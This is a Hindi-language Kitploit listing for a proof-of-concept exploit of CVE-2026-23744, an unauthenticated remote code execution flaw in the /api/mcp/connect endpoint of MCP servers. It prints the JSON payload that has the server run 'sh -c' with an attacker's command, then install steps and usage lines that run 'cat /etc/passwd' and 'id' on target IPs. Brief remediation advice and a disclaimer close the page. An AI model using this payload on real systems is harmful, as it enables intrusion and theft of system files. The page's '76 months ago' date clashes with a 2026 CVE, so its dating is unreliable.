Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/d3vn0mi/cve-2026-23744-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubd3vn0mi/cve-2026-23744-poc

CVE-2026-23744-POC

# CVE-2026-23744 के लिए Python PoC, MCP सर्वरों में /api/mcp/connect serverConfig कमांड फ़ील्ड के माध्यम से अनप्रमाणित RCE (डिफ़ॉल्ट पोर्ट 6274)

रिपॉजिटरी देखें
76 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23744 — MCP सर्वर अनप्रमाणित RCE

d3vn0mi द्वारा प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट

अवलोकन

CVE-2026-23744 पोर्ट 6274 पर उजागर MCP-संगत सर्वरों में एक अनप्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता है। /api/mcp/connect एंडपॉइंट एक serverConfig ऑब्जेक्ट स्वीकार करता है जो कॉल करने वालों को एक मनमाना OS कमांड और तर्क निर्दिष्ट करने की अनुमति देता है — बिना किसी प्रमाणीकरण या प्राधिकरण जांच के।

सेवा तक नेटवर्क पहुंच रखने वाला हमलावर MCP सर्वर चलाने वाले उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित कर सकता है।

विवरणमान
CVE IDCVE-2026-23744
प्रकारअनप्रमाणित रिमोट कोड निष्पादन
एंडपॉइंटPOST /api/mcp/connect
पोर्ट6274 (डिफ़ॉल्ट)
गंभीरताक्रिटिकल

भेद्य पेलोड

{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_COMMAND>"],
    "env": {}
  },
  "serverId": "anything"
}

सर्वर बिना सैनिटाइज़ेशन या एक्सेस नियंत्रण के दिए गए args के साथ आपूर्ति किए गए command को स्पॉन करता है।

इंस्टॉलेशन

git clone https://github.com/d3vn0mi/CVE-2026-23744-POC.git
cd CVE-2026-23744-POC
pip install -r requirements.txt

उपयोग

# बेसिक उपयोग
python3 exploit.py -t <TARGET_IP> -c '<COMMAND>'

# कस्टम पोर्ट
python3 exploit.py -t 192.168.1.10 -p 6274 -c 'id > /tmp/pwned.txt'

# पहुंच-क्षमता जांच छोड़ें
python3 exploit.py -t 10.0.0.5 -c 'whoami' --no-check

# कस्टम सर्वर ID
python3 exploit.py -t 127.0.0.1 -c 'cat /etc/passwd' -s my_server

विकल्प

फ़्लैगविवरण
-t, --targetलक्ष्य IP या होस्टनाम (आवश्यक)
-c, --commandनिष्पादित करने के लिए OS कमांड (आवश्यक)
-p, --portलक्ष्य पोर्ट (डिफ़ॉल्ट: 6274)
-s, --server-idपेलोड में serverId मान
--timeoutप्रोब टाइमआउट सेकंड में (डिफ़ॉल्ट: 30)
--no-checkप्रारंभिक पहुंच-क्षमता जांच छोड़ें

उपचार

  • MCP सर्वर को अविश्वसनीय नेटवर्क पर उजागर न करें।
  • उपलब्ध होते ही विक्रेता पैच लागू करें।
  • प्रमाणीकरण और नेटवर्क-स्तरीय नियंत्रणों के माध्यम से /api/mcp/connect एंडपॉइंट तक पहुंच प्रतिबंधित करें।
  • MCP सर्वर प्रक्रिया से अप्रत्याशित प्रोसेस स्पॉनिंग की निगरानी करें।

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।

लेखक

d3vn0mi — github.com/d3vn0mi

टूल डाउनलोड करें